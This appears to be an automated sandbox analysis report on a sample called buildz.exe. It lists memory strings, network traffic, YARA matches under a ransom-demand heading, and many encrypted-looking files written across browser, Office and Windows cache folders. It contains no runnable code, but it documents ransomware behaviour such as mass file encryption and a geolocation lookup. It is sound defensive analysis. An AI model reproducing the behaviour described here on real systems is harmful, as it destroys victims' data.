          Source: buildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonCP
          Source: buildz.exe, 0000000A.00000002.2344992065.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonI
          Source: buildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonJiv
          Source: buildz.exe, 0000000C.00000002.2435783608.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonUd
          Source: buildz.exe, 0000000C.00000002.2435783608.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonV
          Source: buildz.exe, 00000002.00000002.2119806926.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonm
          Source: buildz.exe, 0000000F.00000002.3295167071.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp
          Source: buildz.exe, 0000000C.00000002.2435783608.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonsoft
          Source: buildz.exe, 0000000C.00000002.2435783608.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont
          Source: buildz.exe, 00000006.00000003.2202553707.0000000000693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonu
          Source: 3870112724rsegmnoittet-es.sqlite.6.drString found in binary or memory: https://bugzilla.mo
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49797 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49858 version: TLS 1.2
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 4708, type: MEMORYSTR
          Source: Yara matchFile source: 2.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.buildz.exe.22b15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.buildz.exe.22815a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.buildz.exe.23115a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.buildz.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.buildz.exe.23015a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.buildz.exe.22b15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.buildz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.buildz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.buildz.exe.23015a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.buildz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.buildz.exe.23115a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.buildz.exe.22615a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.buildz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.buildz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.buildz.exe.22615a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 5576, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 5272, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 5240, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 7120, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 940, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 6848, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 5700, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 2148, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: buildz.exe PID: 4708, type: MEMORYSTR
          Source: C:\Users\user\Desktop\buildz.exeFile moved: C:\Users\user\Desktop\NVWZAPQSQL\EFOYFBOLXA.xlsxJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile moved: C:\Users\user\Desktop\ZGGKNSUKOP.xlsxJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile deleted: C:\Users\user\Desktop\ZGGKNSUKOP.xlsxJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile moved: C:\Users\user\Desktop\NWCXBPIUYI.mp3Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile deleted: C:\Users\user\Desktop\NWCXBPIUYI.mp3Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt entropy: 7.99691720526Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt entropy: 7.99528149002Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt entropy: 7.99036039954Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_23[1].txt entropy: 7.9982293987Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt entropy: 7.99859682288Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt entropy: 7.99854794148Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt entropy: 7.99056115797Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt entropy: 7.99860169864Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99809485747Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt entropy: 7.99525684959Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt entropy: 7.9968265116Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99855865867Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99609096579Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js entropy: 7.99526958887Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99866810748Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\1696426835649.b06d08be-79e8-4bfe-b6aa-988ea3d35cbd.first-shutdown.jsonlz4 entropy: 7.99037133129Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\1696426835647.a83301c6-790b-49f3-adc7-55a855f7fe79.main.jsonlz4 entropy: 7.99107717383Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99601359865Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\uANxnX_BheDjd2-cdR8N9DEWlds[1].css entropy: 7.99144196126Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99559731525Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99795714436Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99758269732Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99260941857Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99874248317Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99115379974Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm entropy: 7.99483066197Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite entropy: 7.9963081838Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm entropy: 7.99473902122Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite entropy: 7.99616958119Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm entropy: 7.99453721112Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite entropy: 7.99619092079Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm entropy: 7.99515899978Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite entropy: 7.99610830083Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm entropy: 7.99458360369Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite entropy: 7.99578847794Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99766207796Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm entropy: 7.9957235727Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99751788985Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99644317351Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99619348321Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99149572575Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99283705511Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99250205303Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99193285394Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99705992094Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db entropy: 7.99809041632Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99810659581Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99755635617Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99820020089Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409003495205506.txt entropy: 7.99818292101Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409000886124092.txt entropy: 7.99806415952Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99319081113Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005089393222.txt entropy: 7.99824157419Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004786866416.txt entropy: 7.9984435328Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004610890001.txt entropy: 7.99824245948Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004157646270.txt entropy: 7.99815353898Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409003693874026.txt entropy: 7.99822041744Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409010467962588.txt entropy: 7.99868229712Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409009155626780.txt entropy: 7.99851921891Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409006446553451.txt entropy: 7.99843570253Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409006148184320.txt entropy: 7.99832353006Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005953011714.txt entropy: 7.99821549488Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005389384955.txt entropy: 7.99829893465Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409023789902202.txt entropy: 7.99851325943Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409022763610746.txt entropy: 7.99867852611Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409021833987004.txt entropy: 7.99830792999Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409021046094069.txt entropy: 7.99870714147Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133726119729237658.txt entropy: 7.9983607914Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133726119415696165.txt entropy: 7.99837524976Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409024501033688.txt entropy: 7.99855126103Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409024089824579.txt entropy: 7.99828411958Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite entropy: 7.99858913685Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99324927425Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99683720988Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99090044309Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png entropy: 7.99264526454Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json entropy: 7.99102414724Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json entropy: 7.99765755343Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json entropy: 7.99146521414Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json entropy: 7.99698346915Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json entropy: 7.99668336901Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json entropy: 7.99676335885Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json entropy: 7.99741430052Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json entropy: 7.99672481802Jump to dropped file
